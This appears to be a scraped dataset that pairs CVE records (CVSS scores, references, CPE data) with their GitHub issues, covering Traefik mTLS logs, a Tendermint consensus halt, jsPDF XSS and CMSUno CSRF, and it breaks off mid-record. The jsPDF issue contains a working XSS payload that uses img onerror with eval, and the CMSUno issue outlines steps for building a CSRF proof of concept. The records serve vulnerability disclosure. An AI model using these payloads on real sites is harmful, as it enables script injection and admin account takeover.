Safari/537.36\"],\"X-Forwarded-Host\":[\"without-mtls.example.com\"],\"X-Forwarded-Port\":[\"443\"],\"X-Forwarded-Proto\":[\"https\"],\"X-Forwarded-Server\":[\"traefik-d9d59cbbc-wlltk\"],\"X-Real-Ip\":[\"159.ip.striped.130\"]},\"ContentLength\":0,\"TransferEncoding\":null,\"Host\":\"without-mtls.example.com\",\"Form\":null,\"PostForm\":null,\"MultipartForm\":null,\"Trailer\":null,\"RemoteAddr\":\"159.ip.striped.130:43792\",\"RequestURI\":\"/\",\"TLS\":null}","level":"debug","msg":"vulcand/oxy/roundrobin/rr: begin ServeHttp on request","time":"2019-09-06T13:22:50Z"},{"ForwardURL":{"Scheme":"http","Opaque":"","User":null,"Host":"192.168.227.112:3020","Path":"","RawPath":"","ForceQuery":false,"RawQuery":"","Fragment":""},"Request":"{\"Method\":\"GET\",\"URL\":{\"Scheme\":\"https\",\"Opaque\":\"\",\"User\":null,\"Host\":\"without-mtls.example.com\",\"Path\":\"/\",\"RawPath\":\"\",\"ForceQuery\":false,\"RawQuery\":\"\",\"Fragment\":\"\"},\"Proto\":\"HTTP/2.0\",\"ProtoMajor\":2,\"ProtoMinor\":0,\"Header\":{\"Accept\":[\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\"],\"Accept-Encoding\":[\"gzip, deflate, br\"],\"Accept-Language\":[\"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,uk;q=0.6\"],\"Cache-Control\":[\"max-age=0\"],\"Dnt\":[\"1\"],\"Sec-Fetch-Mode\":[\"navigate\"],\"Sec-Fetch-Site\":[\"none\"],\"Sec-Fetch-User\":[\"?1\"],\"Upgrade-Insecure-Requests\":[\"1\"],\"User-Agent\":[\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\"],\"X-Forwarded-Host\":[\"without-mtls.example.com\"],\"X-Forwarded-Port\":[\"443\"],\"X-Forwarded-Proto\":[\"https\"],\"X-Forwarded-Server\":[\"traefik-d9d59cbbc-wlltk\"],\"X-Real-Ip\":[\"159.ip.striped.130\"]},\"ContentLength\":0,\"TransferEncoding\":null,\"Host\":\"without-mtls.example.com\",\"Form\":null,\"PostForm\":null,\"MultipartForm\":null,\"Trailer\":null,\"RemoteAddr\":\"159.ip.striped.130:43792\",\"RequestURI\":\"/\",\"TLS\":null}","level":"debug","msg":"vulcand/oxy/roundrobin/rr: Forwarding this request to URL","time":"2019-09-06T13:22:50Z"},{"Request":"{\"Method\":\"GET\",\"URL\":{\"Scheme\":\"https\",\"Opaque\":\"\",\"User\":null,\"Host\":\"without-mtls.example.com\",\"Path\":\"/\",\"RawPath\":\"\",\"ForceQuery\":false,\"RawQuery\":\"\",\"Fragment\":\"\"},\"Proto\":\"HTTP/2.0\",\"ProtoMajor\":2,\"ProtoMinor\":0,\"Header\":{\"Accept\":[\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\"],\"Accept-Encoding\":[\"gzip, deflate, br\"],\"Accept-Language\":[\"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,uk;q=0.6\"],\"Cache-Control\":[\"max-age=0\"],\"Dnt\":[\"1\"],\"Sec-Fetch-Mode\":[\"navigate\"],\"Sec-Fetch-Site\":[\"none\"],\"Sec-Fetch-User\":[\"?1\"],\"Upgrade-Insecure-Requests\":[\"1\"],\"User-Agent\":[\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\"],\"X-Forwarded-Host\":[\"without-mtls.example.com\"],\"X-Forwarded-Port\":[\"443\"],\"X-Forwarded-Proto\":[\"https\"],\"X-Forwarded-Server\":[\"traefik-d9d59cbbc-wlltk\"],\"X-Real-Ip\":[\"159.ip.striped.130\"]},\"ContentLength\":0,\"TransferEncoding\":null,\"Host\":\"without-mtls.example.com\",\"Form\":null,\"PostForm\":null,\"MultipartForm\":null,\"Trailer\":null,\"RemoteAddr\":\"159.ip.striped.130:43792\",\"RequestURI\":\"/\",\"TLS\":null}","level":"debug","msg":"vulcand/oxy/roundrobin/rr: completed ServeHttp on request","time":"2019-09-06T13:22:50Z"},{"entryPointName":"http","level":"info","msg":"Trusted connection","time":"2019-09-06T13:22:53Z"},{"entryPointName":"http","level":"info","msg":"Use header remote addr","time":"2019-09-06T13:22:53Z"},{"entryPointName":"http","level":"info","msg":"Header parsed &{192.168.39.57:8692 192.168.39.57:32724}","time":"2019-09-06T13:22:53Z"},{"level":"debug","msg":"Skipping Kubernetes event kind *v1.Endpoints","providerName":"kubernetescrd","time":"2019-09-06T13:22:53Z"},{"Request":"{\"Method\":\"GET\",\"URL\":{\"Scheme\":\"https\",\"Opaque\":\"\",\"User\":null,\"Host\":\"meow.example.com\",\"Path\":\"/\",\"RawPath\":\"\",\"ForceQuery\":false,\"RawQuery\":\"\",\"Fragment\":\"\"},\"Proto\":\"HTTP/2.0\",\"ProtoMajor\":2,\"ProtoMinor\":0,\"Header\":{\"Accept\":[\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\"],\"Accept-Encoding\":[\"gzip, deflate, br\"],\"Accept-Language\":[\"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,uk;q=0.6\"],\"Cache-Control\":[\"max-age=0\"],\"Dnt\":[\"1\"],\"Sec-Fetch-Mode\":[\"navigate\"],\"Sec-Fetch-Site\":[\"none\"],\"Sec-Fetch-User\":[\"?1\"],\"Upgrade-Insecure-Requests\":[\"1\"],\"User-Agent\":[\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\"],\"X-Forwarded-Host\":[\"meow.example.com\"],\"X-Forwarded-Port\":[\"443\"],\"X-Forwarded-Proto\":[\"https\"],\"X-Forwarded-Server\":[\"traefik-d9d59cbbc-wlltk\"],\"X-Real-Ip\":[\"159.ip.striped.130\"]},\"ContentLength\":0,\"TransferEncoding\":null,\"Host\":\"meow.example.com\",\"Form\":null,\"PostForm\":null,\"MultipartForm\":null,\"Trailer\":null,\"RemoteAddr\":\"159.ip.striped.130:43792\",\"RequestURI\":\"/\",\"TLS\":null}","level":"debug","msg":"vulcand/oxy/roundrobin/rr: begin ServeHttp on request","time":"2019-09-06T13:22:54Z"},{"ForwardURL":{"Scheme":"http","Opaque":"","User":null,"Host":"192.168.171.212:8080","Path":"","RawPath":"","ForceQuery":false,"RawQuery":"","Fragment":""},"Request":"{\"Method\":\"GET\",\"URL\":{\"Scheme\":\"https\",\"Opaque\":\"\",\"User\":null,\"Host\":\"meow.example.com\",\"Path\":\"/\",\"RawPath\":\"\",\"ForceQuery\":false,\"RawQuery\":\"\",\"Fragment\":\"\"},\"Proto\":\"HTTP/2.0\",\"ProtoMajor\":2,\"ProtoMinor\":0,\"Header\":{\"Accept\":[\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\"],\"Accept-Encoding\":[\"gzip, deflate, br\"],\"Accept-Language\":[\"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,uk;q=0.6\"],\"Cache-Control\":[\"max-age=0\"],\"Dnt\":[\"1\"],\"Sec-Fetch-Mode\":[\"navigate\"],\"Sec-Fetch-Site\":[\"none\"],\"Sec-Fetch-User\":[\"?1\"],\"Upgrade-Insecure-Requests\":[\"1\"],\"User-Agent\":[\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\"],\"X-Forwarded-Host\":[\"meow.example.com\"],\"X-Forwarded-Port\":[\"443\"],\"X-Forwarded-Proto\":[\"https\"],\"X-Forwarded-Server\":[\"traefik-d9d59cbbc-wlltk\"],\"X-Real-Ip\":[\"159.ip.striped.130\"]},\"ContentLength\":0,\"TransferEncoding\":null,\"Host\":\"meow.example.com\",\"Form\":null,\"PostForm\":null,\"MultipartForm\":null,\"Trailer\":null,\"RemoteAddr\":\"159.ip.striped.130:43792\",\"RequestURI\":\"/\",\"TLS\":null}","level":"debug","msg":"vulcand/oxy/roundrobin/rr: Forwarding this request to URL","time":"2019-09-06T13:22:54Z"},{"Request":"{\"Method\":\"GET\",\"URL\":{\"Scheme\":\"https\",\"Opaque\":\"\",\"User\":null,\"Host\":\"meow.example.com\",\"Path\":\"/\",\"RawPath\":\"\",\"ForceQuery\":false,\"RawQuery\":\"\",\"Fragment\":\"\"},\"Proto\":\"HTTP/2.0\",\"ProtoMajor\":2,\"ProtoMinor\":0,\"Header\":{\"Accept\":[\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\"],\"Accept-Encoding\":[\"gzip, deflate, br\"],\"Accept-Language\":[\"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,uk;q=0.6\"],\"Cache-Control\":[\"max-age=0\"],\"Dnt\":[\"1\"],\"Sec-Fetch-Mode\":[\"navigate\"],\"Sec-Fetch-Site\":[\"none\"],\"Sec-Fetch-User\":[\"?1\"],\"Upgrade-Insecure-Requests\":[\"1\"],\"User-Agent\":[\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\"],\"X-Forwarded-Host\":[\"meow.example.com\"],\"X-Forwarded-Port\":[\"443\"],\"X-Forwarded-Proto\":[\"https\"],\"X-Forwarded-Server\":[\"traefik-d9d59cbbc-wlltk\"],\"X-Real-Ip\":[\"159.ip.striped.130\"]},\"ContentLength\":0,\"TransferEncoding\":null,\"Host\":\"meow.example.com\",\"Form\":null,\"PostForm\":null,\"MultipartForm\":null,\"Trailer\":null,\"RemoteAddr\":\"159.ip.striped.130:43792\",\"RequestURI\":\"/\",\"TLS\":null}","level":"debug","msg":"vulcand/oxy/roundrobin/rr: completed ServeHttp on request","time":"2019-09-06T13:22:54Z"}] ``` curl requuest without certs logs ``` {"level":"debug","msg":"No secret name provided","providerName":"kubernetescrd","time":"2019-09-06T13:41:47Z"} {"level":"debug","msg":"Skipping Kubernetes event kind *v1.Endpoints","providerName":"kubernetescrd","time":"2019-09-06T13:41:47Z"} {"entryPointName":"https","level":"info","msg":"Trusted connection","time":"2019-09-06T13:41:47Z"} {"entryPointName":"https","level":"info","msg":"Use header remote addr","time":"2019-09-06T13:41:47Z"} {"entryPointName":"https","level":"info","msg":"Header parsed \u0026{159.224.44.130:49202 192.168.107.142:443}","time":"2019-09-06T13:41:47Z"} 2019/09/06 13:41:47 server.go:3055: http: TLS handshake error from 159.224.44.130:49202: tls: client didn't provide a certificate ```
Mutual TLS verification skipped for established connection
https://api.github.com/repos/traefik/traefik/issues/5312/comments
8
2019-09-06T13:32:38Z
2020-08-08T00:00:03Z
https://github.com/traefik/traefik/issues/5312
490,330,116
5,312
1,333
CVE-2020-15091
2020-07-02T17:15:12.547
TenderMint from version 0.33.0 and before version 0.33.6 allows block proposers to include signatures for the wrong block. This may happen naturally if you start a network, have it run for some time and restart it (**without changing chainID**). A malicious block proposer (even with a minimal amount of stake) can use this vulnerability to completely halt the network. This issue is fixed in Tendermint 0.33.6 which checks all the signatures are for the block with 2/3+ majority before creating a commit.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tendermint/tendermint/commit/480b995a31727593f58b361af979054d17d84340" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tendermint/tendermint/issues/4926" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tendermint/tendermint/security/advisories/GHSA-6jqj-f58p-mrw3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tendermint/tendermint/commit/480b995a31727593f58b361af979054d17d84340" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tendermint/tendermint/issues/4926" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tendermint/tendermint/security/advisories/GHSA-6jqj-f58p-mrw3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tendermint:tendermint:*:*:*:*:*:*:*:*", "matchCriteriaId": "48BDDFA1-3EF9-4F28-9686-41B9A2898B79", "versionEndExcluding": "0.33.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "0.33.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "347" ]
347
https://github.com/tendermint/tendermint/issues/4926
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "tendermint", "tendermint" ]
**Tendermint version**: Tendermint Core Semantic Version: 0.33.3 P2P Protocol Version: 7 Block Protocol Version: 10 ``` "node_info": { "protocol_version": { "p2p": "7", "block": "10", "app": "0" }, "id": "dbc39feecf277f59b4b16ae277e8545c54ac244a", "listen_addr": "tcp://0.0.0.0:26656", "network": "bluzelle", "version": "0.33.3", "channels": "4020212223303800", "moniker": "daemon-sentry-3", "other": { "tx_index": "on", "rpc_address": "tcp://0.0.0.0:26657" } ``` **ABCI app**: Cosmos SDK Version: v0.38.3 ``` "application_version": { "name": "BluzelleService", "server_name": "blzd", "client_name": "blzcli", "version": "0.0.0-74-ge1ee575", "commit": "e1ee575051ad2ea18ef22fc6bf7a6fc904612a49", "build_tags": "ledger,faucet,cosmos-sdk v0.38.3", "go": "go version go1.14.3 linux/amd64" } ``` Big Dipper Explorer URL: ``` http://explorer.testnet.public.bluzelle.com:3000 ``` Instructions to setup a similar node (I'd suggest just setting up a sentry): ``` https://github.com/bluzelle/curium/blob/devel/docs/public/buildvalidatorsentry.md ``` Access to genesis file for chain: ``` http://a.sentry.bluzellenet.bluzelle.com:1317/genesis.json ``` Sample command to get node info: ``` curl --location --request GET 'http://a.sentry.testnet.public.bluzelle.com:1317/node_info' ``` Discord channel invite (in case you want to live chat with me... I am Neeraj one of the admins): ``` https://discord.gg/BbBZJZJ ``` **Environment**: - **OS** (e.g. from /etc/os-release): ``` Distributor ID: Ubuntu Description: Ubuntu 18.04.4 LTS Release: 18.04 Codename: bionic ``` - **Install tools**: Using COSMOS SDK v0.38.3. Otherwise, not sure what else to say here. - **Others**: We are running a testnet chain with our CRUD database as one of the application modules, in COSMOS. We currently (as of filing this issue) have 5 "sentries" and 3 validators. To be clear, the sentries have no voting power and are the only peers that the validators talk to (the validators can talk to each other too). Furthermore, the validators are IP firewalled to only be able to talk to the sentries and other validators. The sentries themselves keep the validator node id's private. Sentry hostnames: ``` a.sentry.testnet.public.bluzelle.com b.sentry.testnet.public.bluzelle.com c.sentry.testnet.public.bluzelle.com d.sentry.testnet.public.bluzelle.com e.sentry.testnet.public.bluzelle.com ``` I am not listing the validator hostnames, since they are inaccessible (due to the firewall) anyways. The validators are only listening on 26656 to validators and sentries. The sentries are listening on 26656 and 26657 and also each run the cosmos REST server, listening on 1317. We have opened our testnet to the public. Members of the public have setup sentries and validators of their own, and are expected to use our five sentries as their P2P peers in config.toml. **What happened**: For weeks, things on our testnet had been running fine. I had dozens of members of the public running validators on it, just so these people could learn the process of setting up a validator, etc. I needed to increase the max # of allowed validators (to something much higher than the default value of 100) in the "app_state/staking/params/max_validators" value in genesis.json. I think that this particular value is a COSMOS thing, but I wanted to mention it for context. We are not using COSMOS governance yet, so we decided to do a hard reset (ie: generate a new genesis.json and start the chain all over). First, here is what I did on my OWN 5 sentries and 3 validators: - Stopped all my sentries and validators. - Wiped out their .blzd folders (this is the name of my "home" folder for my "blzd" daemons). Because of this, the nodes will all get new node ids and will be new "peers". - Re-initialized each sentry and validator with "blzd init", etc... much like I always do when I setup a validator or sentry from scratch (setting up peers, etc). I had also increased the "max_num_inbound_peers" to 800 and "max_num_outbound_peers" to 200, in the [p2p] section of config.toml. This might only be anecdotal in value. I had an issue where we had too many connects to my sentries and they were dropping connections on the p2p port. - Generated the new genesis. - Deployed this genesis to all the sentries and validators. - Run the necessary COSMOS commands to get the validators staked, created, etc. - Start up all my sentries and validators, (thereby starting up the new chain from block 0). Next, here is what I asked the people in the community to do with their validator and/or sentries: - Run "blzd unsafe-reset-all" on all their daemons. I asked the community do this instead of wiping out the ".blzd" folder, to save them some work. - Copy over the new genesis.json file, replacing the old genesis.json. - Set the new peers list in the p2p section of config.toml. - Run the necessary COSMOS commands to get the validators staked, created, etc. - Start up their sentries and validators. The community slowly started up their daemons. At some point (within an hour or so, about 2300 blocks in), I started to get the error below. I was getting this on all my sentries and validators. Basically, the chain had completely crashed. I tried to restart my validators and sentries, but this was unrecoverable. ``` E[2020-05-29|03:03:32.975] enterPrevote: ProposalBlock is invalid module=consensus height=2285 round=0 err="wrong signature (#35): C683341000384EA00A345F9DB9608292F65EE83B51752C0A375A9FCFC2BD895E0792A0727925845DC13BA0E208C38B7B12B2218B2FE29B6D9135C53D7F253D05" E[2020-05-29|03:03:35.128] enterPrevote: ProposalBlock is invalid module=consensus height=2285 round=1 err="wrong signature (#35): C683341000384EA00A345F9DB9608292F65EE83B51752C0A375A9FCFC2BD895E0792A0727925845DC13BA0E208C38B7B12B2218B2FE29B6D9135C53D7F253D05" E[2020-05-29|03:03:37.255] enterPrevote: ProposalBlock is invalid module=consensus height=2285 round=2 err="wrong signature (#35): C683341000384EA00A345F9DB9608292F65EE83B51752C0A375A9FCFC2BD895E0792A0727925845DC13BA0E208C38B7B12B2218B2FE29B6D9135C53D7F253D05" . . . ``` To had no choice but to "reset" the whole chain again. I stopped all my validators and sentries and this time, ONLY ran "unsafe-reset-all" on all my daemons. Of course, I also had to do some COSMOS setup again (staking, etc), but started everything again, and asked the community to again do the same steps listed above with yet a new genesis.json, etc. Within an hour, the whole network went down again. Effectively the same error (different block, signature HASH this time): ``` . . . E[2020-05-29|06:57:48.621] enterPrevote: ProposalBlock is invalid module=consensus height=676 round=146 err="wrong signature (#8): 62A6A628CFB1F72D76C48F71A928DD628E29585DD4B861EDF3F216E77FBB0A7C492D2280B218FBA34A0751F02961C2657708711D3F212800CFE847B804F0360D . . . ``` **What you expected to happen**: I expect "clean" output, as so: ``` I[2020-05-30|21:53:04.286] Executed block module=state height=20416 validTxs=0 invalidTxs=2 I[2020-05-30|21:53:04.309] Committed state module=state height=20416 txs=2 appHash=80D70DC5FF062F34D3F79F15FC85CB367A5A7F9CF39B4EE6C1DC68E9F1958EA1 ``` (The fact that invalidTxs is non-zero is the subject of another investigation) **Have you tried the latest version**: Not sure. I think so. Although in looking at the Tendermint Github, I see there are two minor versions available that are newer than what we have. **How to reproduce it**: I more or less explained how it came about above in the "what happened" section. Looking at #2720, I see a similar error message, but not quite the same. But in looking at that issue, it was suggested that perhaps all the nodes did not start from the same "genesis" state. It is suggested that perhaps some node(s) have a stale "home folder" (.blzd, I presume?). Does "unsafe-reset-all" actually clear out all state including the COSMOS KV stores, app state, etc? I assume this command is sufficient to accomplish a clean slate? Is it possible that in "resetting" my chain as I did above, some members of the public possibly forgot to run that "blzd unsafe-reset-all" command, and by missing this step, when they started their node, it had data from the previous chain left over, and this somehow brought the whole network down? If so, it is a bit scary that a single node (or even a bunch of them) could do this. It is an excellent DoS attack vector, it seems, if so. **Logs**: Listed above. **Config**: No specific changes made to Tendermint. **node command runtime flags**: This is all running from within our daemon that was built with the COSMOS SDK. **`/dump_consensus_state` output for consensus bugs** Not sure how to do this. **Anything else we need to know**: Most details given above. I did some searching ahead of time to see if I could resolve this myself. I saw some issues related to it but they are already closed.
Consensus: "enterPrevote: ProposalBlock is invalid" - Error: "wrong signature"
https://api.github.com/repos/tendermint/tendermint/issues/4926/comments
17
2020-05-31T06:18:15Z
2020-07-03T09:59:16Z
https://github.com/tendermint/tendermint/issues/4926
627,901,870
4,926
1,334
CVE-2020-7690
2020-07-06T13:15:10.610
All affected versions <2.0.0 of package jspdf are vulnerable to Cross-site Scripting (XSS). It is possible to inject JavaScript code via the html method.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/MrRio/jsPDF/issues/2795" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-JSPDF-575256" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/MrRio/jsPDF/issues/2795" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-JSPDF-575256" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:parall:jspdf:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "386200BA-6CC6-42AD-8D2B-DBE8DAEAF822", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/MrRio/jsPDF/issues/2795
[ "Exploit", "Third Party Advisory" ]
github.com
[ "MrRio", "jsPDF" ]
When using the html method, it is possible to inject code that is executed in the user context. E.g. like this: ```js const doc = new jsPDF(); window.html2canvas = html2canvas; const html = ` <p id='test'>a</p> <img src=x onerror=eval("document.getElementById('test').innerHTML=window.location") /> `; doc.html(html, { callback: function (doc) { doc.save(); } }); ``` E.g., this line seems to be suspicious: https://github.com/MrRio/jsPDF/blob/master/src/modules/html.js#L52. We need to analyze how to fix this and if there is other vulnerable code.
XSS vulnerability in html method
https://api.github.com/repos/parallax/jsPDF/issues/2795/comments
4
2020-07-02T15:07:14Z
2020-07-09T14:00:14Z
https://github.com/parallax/jsPDF/issues/2795
650,007,126
2,795
1,335
CVE-2020-15600
2020-07-07T22:15:10.317
An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/158455/CMSUno-1.6-Cross-Site-Request-Forgery.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/boiteasite/cmsuno/issues/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/158455/CMSUno-1.6-Cross-Site-Request-Forgery.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/boiteasite/cmsuno/issues/15" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cmsuno_project:cmsuno:*:*:*:*:*:*:*:*", "matchCriteriaId": "66BE864A-39B8-42BD-A115-0084D9A5F2DE", "versionEndExcluding": "1.6.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/boiteasite/cmsuno/issues/15
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "boiteasite", "cmsuno" ]
Affected software: Cmsuno CMS Type of vulnerability: CSRF (Cross-Site Request Forgery) Discovered by: Noth Author: Noth Version : v.1.6 Description: Cmsuno CMS is vulnerable to persistent Cross-Site Request Forgery attacks, which allow malicious users to inject HTML or scripts and forge user permissions to operate . Vulnerable URL: http://127.0.0.1/cmsuno-master/uno.php Step 1 : go to uno.php Step 2 : Use burpsuite to intercept packets Step 3 : Generate PoC ![2020-05-31_053816](https://user-images.githubusercontent.com/45315211/83339495-fab95980-a300-11ea-8c61-cc6eb3de9b22.jpg) Test Video : https://drive.google.com/file/d/1ueOxpMRr632gxjDyn-7t8nWlm13iQXgH/view?usp=sharing No CSRF Token so that can login to the system .
CSRF Vulnerability v1.6
https://api.github.com/repos/boiteasite/cmsuno/issues/15/comments
7
2020-05-30T21:38:48Z
2021-08-04T17:56:47Z
https://github.com/boiteasite/cmsuno/issues/15
627,827,921
15
1,336
CVE-2020-7692
2020-07-09T14:15:11.107
PKCE support is not implemented in accordance with the RFC for OAuth 2.0 for Native Apps. Without the use of PKCE, the authorization code returned by an authorization server is not enough to guarantee that the client that issued the initial authorization request is the one that will be authorized. An attacker is able to obtain the authorization code using a malicious app on the client-side and use it to gain authorization to the protected resource. This affects the package com.google.oauth-client:google-oauth-client before 1.31.0.
